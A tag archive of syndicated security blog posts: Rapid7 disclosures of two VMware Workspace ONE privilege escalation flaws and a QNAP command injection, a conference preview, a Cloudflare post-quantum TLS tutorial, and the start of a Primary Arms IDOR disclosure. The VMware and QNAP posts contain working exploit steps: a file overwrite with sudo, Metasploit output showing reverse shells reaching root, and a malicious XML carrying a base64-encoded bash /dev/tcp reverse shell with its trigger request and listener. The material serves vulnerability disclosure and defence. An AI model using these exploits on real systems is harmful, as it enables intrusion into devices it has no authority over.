Tag Archives: research

CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/

The VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged horizon user can escalate their permissions to those of the root user. Notably, the horizon user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. At the time of this writing, CVE-2022-22954 is one such RCE vulnerability (which notably has a corresponding Metasploit module) and can easily be chained with one or both of the issues described herein.

Product description

VMware Workspace ONE Access is a platform that gives organizations a way to provide their employees with fast and easy access to the applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.

Impact

These vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be horizon for successful exploitation.

That said, it’s important to note that the horizon user runs the externally accessible web application, which has seen several recent vulnerabilities — namely CVE-2022-22954, which, when exploited, allows for remote code execution as the horizon user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.

Credit

These issues were disclosed by VMware on Tuesday, August 2, 2022 within the VMSA-2022-0021 bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. They were disclosed in accordance with Rapid7’s vulnerability disclosure policy.

CVE-2022-31660

CVE-2022-31660 arises from the fact that the permissions on the file /opt/vmware/certproxy/bin/cert-proxy.sh are such that the horizon user is both the owner of this file and able to invoke it.

To demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the horizon user:

sudo /usr/local/horizon/scripts/certproxyService.sh restart

Note that, depending on the patch level of the system, the certproxyService.sh script may be located at an alternative path and require a slightly different command:

sudo /opt/vmware/certproxy/bin/certproxyService.sh restart

In both cases, the horizon user is able to invoke the certproxyService.sh script from sudo without a password. This can be verified by executing sudo -n --list. The certproxyService.sh script invokes the systemctl command to restart the service based on its configuration file. The service configuration file, located at /run/systemd/generator.late/vmware-certproxy.service, dispatches to /etc/rc.d/init.d/vmware-certproxy through the ExecStart and ExecStop directives, which in turn executes /opt/vmware/certproxy/bin/cert-proxy.sh.
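
Putting those pieces together, a manual exploitation sequence run from a shell as the horizon user might look roughly like the following sketch. The payload written into cert-proxy.sh is purely illustrative (not the Metasploit module's payload), and on some patch levels the certproxyService.sh path would be the /opt/vmware variant noted above.

# Run as the horizon user. Minimal sketch of the CVE-2022-31660 chain;
# the payload below is a placeholder for demonstration only.
sudo -n --list                                                        # confirm the passwordless sudo entry
cp /opt/vmware/certproxy/bin/cert-proxy.sh /tmp/cert-proxy.sh.bak     # back up the original script

cat > /opt/vmware/certproxy/bin/cert-proxy.sh <<'EOF'
#!/bin/bash
# Placeholder payload: runs as root when the service restarts.
id > /tmp/cve-2022-31660-proof
EOF

sudo /usr/local/horizon/scripts/certproxyService.sh restart           # root re-executes the overwritten script
cat /tmp/cve-2022-31660-proof                                         # expect uid=0(root)

cp /tmp/cert-proxy.sh.bak /opt/vmware/certproxy/bin/cert-proxy.sh     # restore the original contents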

Proof of concept

To demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in PR #16854.

With an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. In this scenario, the original Meterpreter session was obtained with the module for CVE-2022-22954, released earlier this year.

[*] Sending stage (40132 bytes) to 192.168.159.98
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400

meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: horizon
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Backing up the original file...
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
[*] Triggering the payload...
[*] Sending stage (40132 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
[*] Restoring file contents...
[*] Restoring file permissions...

meterpreter > getuid
Server username: root
meterpreter >

CVE-2022-31661

CVE-2022-31661 arises from the fact that the /usr/local/horizon/scripts/getProtectedLogFiles.hzn script can be run with root privileges, without a password, using the sudo command. This script in turn recursively changes the ownership of a user-supplied directory to the horizon user, effectively granting that user write permissions to all of its contents.

To demonstrate and exploit this vulnerability, we can execute the following command as the horizon user:

sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/

At this point, the horizon user has write access (through ownership) to a variety of scripts that they also have the right to invoke using sudo without a password. That list of scripts can be verified by executing sudo -n --list. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored it once they had obtained root-level permissions.
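
As a rough sketch, that sequence as the horizon user might look like the following. Recording the original ownership first mirrors the careful-attacker behavior described above; the payload that would then be planted in one of the newly writable sudo-able scripts is omitted, and GNU find is assumed to be available on the appliance.

# Run as the horizon user. Sketch of the CVE-2022-31661 primitive.
TARGET=/usr/local/horizon/scripts

# Record the current owner and group of each file so they can be restored later.
find "$TARGET" -maxdepth 1 -type f -printf '%u:%g %p\n' > /tmp/ownership.bak

# The passwordless sudo entry recursively chowns the target directory to horizon.
sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs "$TARGET"

ls -l "$TARGET"    # the sudo-able scripts listed by 'sudo -n --list' are now owned by horizon

# Once root access has been obtained via one of those scripts, restore ownership, e.g.:
#   while read owner path; do chown "$owner" "$path"; done < /tmp/ownership.bak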

The root cause of this vulnerability is that the exportProtectedLogs subcommand invokes the getProtectedLogs function that will change the ownership information to the TOMCAT_USER, which happens to be horizon.

Excerpt from getProtectedLogFiles.hzn:

function getProtectedLogs()
{
    chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION
    rm -f $TARGET_DIR_LOCATION/messages*
    rm -f $TARGET_DIR_LOCATION/boot*
    rm -rf $TARGET_DIR_LOCATION/journal*

    cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION
    cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION
    chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/

}

Remediation

Users should apply patches released in VMSA-2022-0021 to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.

Note that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. For practical purposes, these are internal, local privilege escalation issues, so enterprises running VMware Workspace ONE Access installations that are otherwise current on patches should schedule updates addressing these issues as part of routine patch cycles.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to vulnerabilities described in VMSA-2022-0021 with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).

Disclosure timeline

  • May 20, 2022 – Issue discovered by Spencer McIntyre of Rapid7
  • June 28, 2022 – Rapid7 discloses the vulnerability to VMware
  • June 29, 2022 – VMware acknowledges receiving the details and begins an investigation
  • June 30, 2022 – VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity’s sake
  • July 1, 2022 – Rapid7 replies, agreeing to leave CERT out
  • July 22, 2022 – VMware states they will publish an advisory once the issues have been fixed, asks whom to credit
  • July 22, 2022 – Rapid7 responds confirming credit, inquires about a target date for a fix
  • August 2, 2022 – VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)
  • August 2, 2022 – Metasploit module submitted on GitHub in PR #16854
  • August 5, 2022 – This disclosure blog

What We’re Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/

The week of Black Hat, DEF CON, and BSides is a highly anticipated annual tradition for the cybersecurity community, a weeklong chance for security pros from all corners of the industry to meet in Las Vegas to talk shop and share what they’ve spent the last 12 months working on.

But like many beloved in-person events, 2020 and 2021 put a major damper on this tradition for the security community, known unofficially as Hacker Summer Camp. Black Hat returned in 2021, but with a much heavier emphasis than in previous years on virtual events over in-person offerings, and many of those who would have attended in non-COVID times opted to take in the briefings from their home offices instead of flying out to Vegas.

This year, however, the week of Black Hat is back in action, in a form that feels much more familiar for those who’ve spent years making the pilgrimage to Vegas each August. That includes a whole lot of Rapid7 team members — it’s been a busy few years for our research and product teams alike, and we’ve got a lot to catch our colleagues up on. Here’s a sneak peek of what we have planned from August 9-12 at this all-star lineup of cybersecurity sessions.

BSidesLV

The week kicks off on Tuesday, August 9 with BSides, a two-day event running on the 9th and 10th that gives security pros, and those looking to enter the field, a chance to come together and share knowledge. Several Rapid7 presenters will be speaking at BSidesLV, including:

  • Ron Bowes, Lead Security Researcher, who will talk about the surprising overlap between spotting cybersecurity vulnerabilities and writing capture-the-flag (CTF) challenges in his presentation “From Vulnerability to CTF.”
  • Jen Ellis, Vice President of Community and Public Affairs, who will cover the ways in which ransomware and major vulnerabilities have impacted the thinking and decisions of government policymakers in her talk “Hot Topics From Policy and the DoJ.”

Black Hat

The heart of the week’s activities, Black Hat, features the highest concentration of presentations out of the three conferences. Our Research team will be leading the charge for Rapid7’s sessions, with appearances from:

  • Curt Barnard, Principal Security Researcher, who will talk about a new way to search for default credentials more easily in his session, "Defaultinator: An Open Source Search Tool for Default Credentials."
  • Spencer McIntyre, Lead Security Researcher, who’ll be covering the latest in modern attack emulation in his presentation, "The Metasploit Framework."
  • Jake Baines, Lead Security Researcher, who’ll be giving not one but two talks at Black Hat.
    • He’ll cover newly discovered vulnerabilities affecting the Cisco ASA and ASA-X firewalls in "Do Not Trust the ASA, Trojans!"
    • Then, he’ll discuss how the Rapid7 Emergent Threat Response team manages an ever-changing vulnerability landscape in "Learning From and Anticipating Emergent Threats."
  • Tod Beardsley, Director of Research, who’ll be beamed in virtually to tell us how we can improve the coordinated, global vulnerability disclosure (CVD) process in his on-demand presentation, "The Future of Vulnerability Disclosure Processes."

We’ll also be hosting a Community Celebration to welcome our friends and colleagues back to Hacker Summer Camp. Come hang out with us, play games, collect badges, and grab a super-exclusive Rapid7 Hacker Summer Camp t-shirt. Head to our Black Hat event page to preregister today!

DEF CON

Rounding out the week, DEF CON offers lots of opportunities for learning and listening as well as hands-on immersion in its series of “Villages.” Rapid7 experts will be helping run two of these Villages:

  • The IoT Village, where Principal Security Researcher for IoT Deral Heiland will take attendees through a multistep process for hardware hacking.
  • The Car Hacking Village, where Patrick Kiley, Principal Security Consultant/Research Lead, will teach you about hacking actual vehicles in a safe, controlled environment.

We’ll also have no shortage of in-depth talks from our team members, including:

  • Harley Geiger, Public Policy Senior Director, who’ll cover how legislative changes impact the way security research is carried out worldwide in his talk, "Hacking Law Is for Hackers: How Recent Changes to CFAA, DMCA, and Other Laws Affect Security Research."
  • Jen Ellis, who’ll give two talks at DEF CON:
    • "Moving Regulation Upstream: An Increasing Focus on the Role of Digital Service Providers," where she’ll discuss the challenges of drafting effective regulations in an environment where attackers often target smaller organizations that exist below the cybersecurity poverty line.
    • "International Government Action Against Ransomware," a deep dive into policy actions taken by global governments in response to the recent rise in ransomware attacks.
  • Jake Baines, who’ll be giving his talk "Do Not Trust the ASA, Trojans!" on Saturday, August 13, in case you weren’t able to catch it earlier in the week at Black Hat.

Whew, that’s a lot — time to get your itinerary sorted. Get the full details of what we’re up to at Hacker Summer Camp, and sign up for our Community Celebration on Wednesday, August 10, at our Black Hat 2022 event page.

QNAP Poisoned XML Command Injection (Silently Patched)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/

Background

CVE-2020-2509 was added to CISA’s Known Exploited Vulnerabilities Catalog in April 2022, and it was listed as one of the “Additional Routinely Exploited Vulnerabilities in 2021” in CISA’s 2021 Top Routinely Exploited Vulnerabilities alert. However, CVE-2020-2509 has no public exploit, and no other organizations have publicly confirmed exploitation in the wild.

CVE-2020-2509 is allegedly an unauthenticated remote command injection vulnerability affecting QNAP Network Attached Storage (NAS) devices using the QTS operating system. The vulnerability was discovered by SAM and publicly disclosed on March 31, 2021. Two weeks later, QNAP issued a CVE and an advisory.

Neither organization provided a CVSS vector to describe the vulnerability. QNAP’s advisory doesn’t even indicate the vulnerable component. SAM’s disclosure says they found the vulnerability when they “fuzzed” the web server’s CGI scripts (which is not generally the way you discover command injection vulnerabilities, but I digress). SAM published a proof-of-concept video that allegedly demonstrates exploitation of the vulnerability, although it doesn’t appear to be a typical straightforward command injection. The recorded exploit downloads BusyBox to establish a reverse shell, and it appears to make multiple requests to accomplish this. That’s many more moving parts than a typical command injection exploit. Regardless, beyond affected versions, there are essentially no usable details for defenders or attackers in either disclosure.

Given the ridiculous number of internet-facing QNAP NAS devices (350,000+), the seemingly endless ransomware attacks on these systems (Qlocker, Deadbolt, and Checkmate), and the mystery surrounding alleged exploitation in the wild of CVE-2020-2509, we decided to find out exactly what CVE-2020-2509 is. Instead, we found the issue described below, which may be an entirely new vulnerability.

Poisoned XML command injection (CVE-2022-XXXX)



[Video: proof-of-concept exploitation of the poisoned XML command injection]

The video demonstrates exploitation of an unauthenticated and remote command injection vulnerability on a QNAP TS-230 running QTS 4.5.1.1480 (reportedly the last version affected by CVE-2020-2509). We were unable to obtain the first patched version, QTS 4.5.1.1495, but we were able to confirm this vulnerability was patched in QTS 4.5.1.1540. However, we don’t think this is CVE-2020-2509. The exploit in the video requires the attacker to be a man-in-the-middle or to have performed a DNS hijack of update.qnap.com. In the video, our lab network’s Mikrotik router has a malicious static DNS entry for update.qnap.com.

SAM and QNAP’s disclosures didn’t mention any type of man-in-the-middle or DNS hijack. But neither disclosure ruled it out either. CVSS vectors are great for this sort of thing. If either organization had published a vector with an Attack Complexity of high, we’d know this “new” vulnerability is CVE-2020-2509. If they’d published a vector with an Attack Complexity of low, we’d know this “new” vulnerability is not CVE-2020-2509. The lack of a vector leaves us unsure. Only CISA’s claim of widespread exploitation leads us to believe this is not CVE-2020-2509. However, this “new” vulnerability is still a high-severity issue. It could reasonably be scored as CVSSv3 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). While the issue was patched 15 to 20 months ago (patches for CVE-2020-2509 were released in November 2020 and April 2021), there are still thousands of internet-facing QNAP devices that remain unpatched against this “new” issue. As such, we are going to describe the issue in more detail.

Exploitation and patch

The “new” vulnerability can be broken down into two parts:

  1. A remote and unauthenticated attacker can force a QNAP device to make an HTTP request to update.qnap.com, without using SSL, in order to download an XML file.
  2. Content from the downloaded XML file is passed to a system call without any sanitization.

Both of these issues can be found in QNAP’s web server cgi-bin executable authLogin.cgi, but the behavior is triggered by a request to /cgi-bin/qnapmsg.cgi. Below is decompiled code from authLogin.cgi that highlights the use of HTTP to fetch a file.

[Screenshot: decompiled authLogin.cgi code showing the HTTP download of the XML file]

Using wget, the QNAP device will download a language-specific XML file such as http://update.qnap.com/loginad/qnapmsg_eng.xml, where eng can be a variety of different values (cze, dan, ger, spa, fre, ita, etc.). When the XML has been downloaded, the device then parses the XML file. When the parser encounters <img> tags, it will attempt to download the associated image using wget.
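
To make that flow concrete, the same fetch-and-parse sequence can be approximated from any Linux host with a couple of commands. This is only an illustration of the behavior, not the device's actual code, and it assumes QNAP still serves the file at that URL.

# Approximate what the NAS does: fetch the language-specific XML over plain
# HTTP, then extract the <img> URLs that get handed to a second wget call.
wget -q -O qnapmsg_eng.xml http://update.qnap.com/loginad/qnapmsg_eng.xml
grep -o '<img>[^<]*</img>' qnapmsg_eng.xml | sed -e 's/<img>//' -e 's/<\/img>//'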

The <img> value is added to a wget command without any type of sanitization, which is a very obvious command injection issue.

The XML, if downloaded straight from QNAP, looks like the following (note that it appears to be part of an advertisement system built into the device):

<?xml version="1.0" encoding="utf-8"?>
<Root>
  <Messages>
    <Message>
      <img>http://update.qnap.com/loginad/image/1_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=822&amp;c=351&amp;sc=513&amp;t=520&amp;n=18168</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/4_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=8685</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/2_eng.jpg</img>
      <link>http://www.facebook.com/QNAPSys</link>
    </Message>
  </Messages>
</Root>

Because of the command injection issue, a malicious attacker can get a reverse shell by providing an XML file that looks like the following. The command injection is performed with backticks, and the actual payload (a bash reverse shell using /dev/tcp) is base64 encoded because / is a disallowed character.

<?xml version="1.0" encoding="utf-8"?>
<Root>
	<Messages>
		<Message>
			<img>/`echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh`</img>
			<link>http://www.qnap.com/></link>
		</Message>
	</Messages>
</Root>

An attacker can force a QNAP device to download the XML file by sending the device an HTTP request similar to http://device_ip/cgi-bin/qnapmsg.cgi?lang=eng. Here, again, eng can be replaced by a variety of languages.
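
Putting the pieces together, a lab-only sketch of the trigger sequence looks something like the following. It assumes update.qnap.com already resolves to an attacker-controlled web server hosting the malicious qnapmsg_eng.xml shown above; the device address is a placeholder, and the listener port matches the example payload.

# Lab-only sketch. Assumes update.qnap.com already resolves to a host we control
# that serves the malicious qnapmsg_eng.xml over plain HTTP.
DEVICE_IP=192.0.2.10    # placeholder address of the QNAP NAS

# Listener for the reverse shell defined in the malicious <img> payload above.
nc -lvnp 1270 &

# Unauthenticated request that makes the NAS fetch and parse the poisoned XML.
curl "http://${DEVICE_IP}/cgi-bin/qnapmsg.cgi?lang=eng"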

Obviously, the number one challenge in exploiting this issue is getting the HTTP requests for update.qnap.com routed to an attacker-controlled system.

Becoming a man-in-the-middle is not easy for a normal attacker. However, APT groups have consistently demonstrated that man-in-the-middle attacks are a part of normal operations. VPNFilter, FLYING PIG, and the DigiNotar incident affecting Iranian users are all historical examples of APTs attacking (or potentially attacking) via man-in-the-middle. An actor that has control of any router between the QNAP device and update.qnap.com can inject the malicious XML we provided above. This, in turn, allows them to execute arbitrary code on the QNAP device.

The other major attack vector is via DNS hijacking. For this vulnerability, the most likely DNS hijack attacks that don’t require man-in-the-middling are a router DNS hijack or a third-party DNS server compromise. In the case of a router DNS hijack, the attacker exploits a router and instructs it to tell all connected devices to use a malicious DNS server or malicious static routes (similar to our lab setup). Third-party DNS server compromise is more interesting because of its ability to scale. Both Mandiant and Talos have observed this type of DNS hijack in the wild. When a third-party DNS server is compromised, an attacker is able to introduce malicious entries to the DNS server.

So, while there is some complexity to exploiting this issue, those complications are easily defeated by a moderately skilled attacker — which calls into question why QNAP didn’t issue an advisory and CVE for this issue. Presumably they knew about the vulnerability, because they made two changes to fix it. First, the insecure HTTP request for the XML was changed to a secure HTTPS request. That prevents all but the most advanced attackers from masquerading as update.qnap.com. Additionally, the image download logic was updated to use an execl wrapper called qnap_exec instead of system, which mitigates command injection issues.
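
To see why the second change matters, compare what happens when an attacker-controlled value is handed to a shell (the system() pattern) versus passed as a single argument vector element (the execl() pattern). This is a simplified shell illustration of the general principle, not QNAP's actual code.

# Simplified illustration of system() vs. execl()-style invocation.
IMG='/`id`'    # hostile value, like the malicious <img> tag above

# system()-style: the whole string is re-parsed by a shell, so the backticks run.
sh -c "wget -t 1 -T 5 $IMG"

# execl()-style: the value is a single argument; no shell, no command substitution.
wget -t 1 -T 5 "$IMG"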

Indicators of compromise

This attack does leave indicators of compromise (IOCs) on disk. A smart attacker will clean up these IOCs, but they may be worth checking for. The XML files are downloaded to /home/httpd/RSS/rssdoc/. The following is an example of the malicious XML from our proof-of-concept video:

[[email protected] rssdoc]$ ls -l
total 32
-rw-r--r-- 1 admin administrators     0 2022-07-27 19:57 gen_qnapmsg_eng.xml
drwxrwxrwx 2 admin administrators  4096 2022-07-26 18:39 image/
-rw-r--r-- 1 admin administrators     8 2022-07-27 19:57 last_uptime.qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators   229 2022-07-27 19:57 qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators 18651 2022-07-27 16:02 wget.log
[[email protected] rssdoc]$ cat qnapmsg_eng.xml 
<?xml version="1.0" encoding="utf-8"?>
<Root>
<Messages>
<Message><img>/`(echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh)&`</img><link>http://www.qnap.com/</link></Message></Messages></Root>

Similarly, an attack can leave an sh process hanging in the background. Search for malicious ones using ps | grep wget. If you see anything like the following, it’s a clear IOC:

[[email protected] rssdoc]$ ps | grep wget
10109 albinolo    476 S   grep wget
12555 admin      2492 S   sh -c /usr/bin/wget -t 1 -T 5 /`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)` -O /home/httpd/RSS/rssdoc/image/`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)`.tmp 1>>/dev/null 2>>/dev/null

Conclusion

Perhaps what we’ve described here is in part CVE-2020-2509, and that explains the lack of advisory from QNAP. Or maybe it’s one of the many other command injections that QNAP has assigned a CVE to but failed to describe, thereby denying users the chance to make informed choices about their security. It’s impossible to know because QNAP publishes almost no details about any of their vulnerabilities — a practice that might thwart some attackers, but certainly harms defenders trying to identify and monitor these attacks in the wild, as well as defenders who have to help clean up the myriad ransomware cases that are affecting QNAP devices.

SAM did not owe us a good disclosure (which is fortunate, because they didn’t give us one), but QNAP did. SAM was successful in ensuring the issue got fixed, and they held the vendor to a coordinated disclosure deadline (which QNAP subsequently failed to meet). We should all be grateful to SAM: Even if their disclosure wasn’t necessarily what we wanted, we all benefited from their work. It’s QNAP that owes us, the customers and security industry, good disclosures. Vendors who are responsible for the security of their products are also responsible for informing the community of the seriousness of vulnerabilities that affect those products. When they fail to do this — for example by failing to provide advisories with basic descriptions, affected components, and industry-standard metrics like CVSS — they deny their current and future users full autonomy over the choices they make about risk to their networks. This makes us all less secure.

Disclosure timeline

  • July, 2022: Researched and discovered by Jake Baines of Rapid7
  • Thu, Jul 28, 2022: Disclosed to QNAP, seeking a CVE ID
  • Sun, Jul 31, 2022: Automated response from vendor indicating they have moved to a new support ticket system and that tickets should be filed with that system. The link to the new ticketing system merely sends Rapid7 to QNAP’s home page.
  • Tue, Aug 2, 2022: Rapid7 informs QNAP via email that their support link is broken and Rapid7 will publish this blog on August 4, 2022.
  • Tue, Aug 2, 2022: QNAP responds directing Rapid7 to the advisory for CVE-2020-2509.
  • Thu, Aug 4, 2022: This public disclosure

Experiment with post-quantum cryptography today

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/experiment-with-pq/

Practically all data sent over the Internet today is at risk in the future if a sufficiently large and stable quantum computer is created. Anyone who captures that data now could decrypt it once such a computer exists.

Luckily, there is a solution: we can switch to so-called post-quantum (PQ) cryptography, which is designed to be secure against attacks of quantum computers. After a six-year worldwide selection process, in July 2022, NIST announced they will standardize Kyber, a post-quantum key agreement scheme. The standard will be ready in 2024, but we want to help drive the adoption of post-quantum cryptography.

Today we have added support for the X25519Kyber512Draft00 and X25519Kyber768Draft00 hybrid post-quantum key agreements to a number of test domains, including pq.cloudflareresearch.com.

Do you want to experiment with post-quantum on your test website for free? Mail [email protected] to enroll your test website, but read the fine-print below.

What does it mean to enable post-quantum on your website?

If you enroll your website in the post-quantum beta, we will add support for these two extra key agreements alongside the existing classical key agreements, such as X25519. If your browser doesn’t support these post-quantum key agreements (and at the time of writing, none do), then your browser will continue working with a classically secure, but not quantum-resistant, connection.

Then how to test it?

We have open-sourced a fork of BoringSSL and Go that has support for these post-quantum key agreements. With those and an enrolled test domain, you can check how your application performs with post-quantum key exchanges. We are working on support for more libraries and languages.

What to look for?

Kyber and classical key agreements such as X25519 have different performance characteristics: Kyber requires less computation, but has bigger keys and requires a bit more RAM to compute. It could very well make the connection faster if used on its own.

We are not using Kyber on its own, though: we are using hybrids. That means we are doing both an X25519 and a Kyber key agreement, such that the connection remains secure as long as either one of them is unbroken. That also means that connections will be a bit slower. In our experiments, the difference is very small, but it’s best to check for yourself.

The fine-print

Cloudflare’s post-quantum cryptography support is a beta service for experimental use only. Enabling post-quantum on your website will subject the website to Cloudflare’s Beta Services terms and will impact other Cloudflare services on the website as described below.

No stability or support guarantees

Over the coming months, both Kyber and the way it’s integrated into TLS will change for several reasons, including:

  1. Kyber will see small, but backward-incompatible changes in the coming months.
  2. We want to be compatible with other early adopters and will change our integration accordingly.
  3. As, together with the cryptography community, we find issues, we will add workarounds in our integration.

We will update our forks accordingly, but cannot guarantee any long-term stability or continued support. PQ support may become unavailable at any moment. We will post updates on pq.cloudflareresearch.com.

Features in enrolled domains

For the moment, we are running enrolled zones on a slightly different infrastructure for which not all features, notably QUIC, are available.

With that out of the way, it’s…

Demo time!

BoringSSL

With the following commands, you can build our fork of BoringSSL and create a TLS connection with pq.cloudflareresearch.com using the compiled bssl tool. Note that we do not enable the post-quantum key agreements by default, so you have to pass the -curves flag.

$ git clone https://github.com/cloudflare/boringssl-pq
[snip]
$ cd boringssl-pq && mkdir build && cd build && cmake .. -Gninja && ninja 
[snip]
$ ./tool/bssl client -connect pq.cloudflareresearch.com -server-name pq.cloudflareresearch.com -curves Xyber512D00
	Connecting to [2606:4700:7::a29f:8a55]:443
Connected.
  Version: TLSv1.3
  Resumed session: no
  Cipher: TLS_AES_128_GCM_SHA256
  ECDHE curve: X25519Kyber512Draft00
  Signature algorithm: ecdsa_secp256r1_sha256
  Secure renegotiation: yes
  Extended master secret: yes
  Next protocol negotiated: 
  ALPN protocol: 
  OCSP staple: no
  SCT list: no
  Early data: no
  Encrypted ClientHello: no
  Cert subject: CN = *.pq.cloudflareresearch.com
  Cert issuer: C = US, O = Let's Encrypt, CN = E1

Go

Our Go fork doesn’t enable the post-quantum key agreement by default. The following simple Go program enables PQ by default for the http package and GETs pq.cloudflareresearch.com.

package main

import (
  "crypto/tls"
  "fmt"
  "net/http"
)

func main() {
  http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{
    CurvePreferences: []tls.CurveID{tls.X25519Kyber512Draft00, tls.X25519},
    CFEventHandler: func(ev tls.CFEvent) {
      switch e := ev.(type) {
      case tls.CFEventTLS13HRR:
        fmt.Printf("HelloRetryRequest\n")
      case tls.CFEventTLS13NegotiatedKEX:
        switch e.KEX {
        case tls.X25519Kyber512Draft00:
          fmt.Printf("Used X25519Kyber512Draft00\n")
        default:
          fmt.Printf("Used %d\n", e.KEX)
        }
      }
    },
  }

  if _, err := http.Get("https://pq.cloudflareresearch.com"); err != nil {
    fmt.Println(err)
  }
}

To run it, we need to compile our Go fork:

$ git clone https://github.com/cloudflare/go
[snip]
$ cd go/src && ./all.bash
[snip]
$ ../bin/go run path/to/example.go
Used X25519Kyber512Draft00

On the wire

So what does this look like on the wire? With Wireshark, we can capture the packet flow. First, a non-post-quantum HTTP/2 connection with X25519:

[Wireshark capture: classical TLS 1.3 handshake using X25519]

This is a normal TLS 1.3 handshake: the client sends a ClientHello with an X25519 keyshare, which fits in a single packet. In return, the server sends its own 32-byte X25519 keyshare. It also sends various other messages, such as the certificate chain, which requires two packets in total.

Let’s check out Kyber:

[Wireshark capture: hybrid TLS 1.3 handshake using X25519Kyber512Draft00]

As you can see, the ClientHello is a bit bigger, but it still fits within a single packet. The response now takes three packets instead of two, because of the larger server keyshare.

Under the hood

Want to add client support yourself? We are using a hybrid of X25519 and Kyber version 3.02. We are writing out the details of the latter in version 00 of this CFRG IETF draft, hence the name. We are using TLS group identifiers 0xfe30 and 0xfe31 for X25519Kyber512Draft00 and X25519Kyber768Draft00 respectively.

There are some differences between our Go and BoringSSL forks that are interesting to compare.

  • Our Go fork uses our fast AVX2 optimized implementation of Kyber from CIRCL. In contrast, our BoringSSL fork uses the simpler portable reference implementation. Without the AVX2 optimisations it’s easier to evaluate. The downside is that it’s slower. Don’t be mistaken: it is still very fast, but you can check yourself.
  • Our Go fork only sends one keyshare. If the server doesn’t support it, it will respond with a HelloRetryRequest message and the client will fall back to one the server does support. This adds a roundtrip.
    Our BoringSSL fork, on the other hand, will send two keyshares: the post-quantum hybrid and a classical one (if a classical key agreement is still enabled). If the server doesn’t recognize the first, it will be able to use the second. In this way we avoid a roundtrip if the server does not support the post-quantum key agreement.

Looking ahead

The quantum future is here. In the coming years the Internet will move to post-quantum cryptography. Today we are offering our customers the tools to get a head start and test post-quantum key agreements. We’d love to hear your feedback: e-mail it to [email protected].

This is just a small, but important first step. We will continue our efforts to move towards a secure and private quantum-secure Internet. Much more to come — watch this space.

Primary Arms PII Disclosure via IDOR

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/08/02/primary-arms-pii-disclosure-via-idor/

The Primary Arms website, a popular e-commerce site dealing in firearms and firearms-related merchandise, suffers from an insecure direct object reference (IDOR) vulnerability, which is an instance of CWE-639: Authorization Bypass Through User-Controlled Key.

